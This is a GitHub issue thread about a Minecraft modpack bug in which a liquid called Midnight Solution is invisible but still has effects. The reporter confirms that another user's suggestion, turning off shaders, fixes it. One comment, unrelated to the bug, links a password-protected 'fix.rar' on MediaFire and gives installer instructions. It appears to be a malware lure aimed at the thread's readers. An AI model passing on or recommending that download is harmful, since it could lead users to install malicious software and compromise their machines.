### ISSUE TITLE
[Bug Report]: Invisible Midnight Solution

### ISSUE THREAD

**Issue by MKcyborg** [TeamAOF/All-of-Fabric-7#307]
### Modpack Version

2.3.0

### Describe your issue.

The Midnight Solution liquid doesn't appear in the game but still affects me and the environment. Given how destructive Midnight Solution can be, it's a pretty big issue. I'm playing the game via CurseForge

### Have you modified the modpack?

No

### Did the issue happen in singleplayer or on a server?

Singleplayer

### Discord Username

MKCyborg

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by PapaZ810** [comment]
I had this issue and solved it by turning off shaders.

**Comment by MKcyborg** [comment]
Whew, that seemed to do the trick
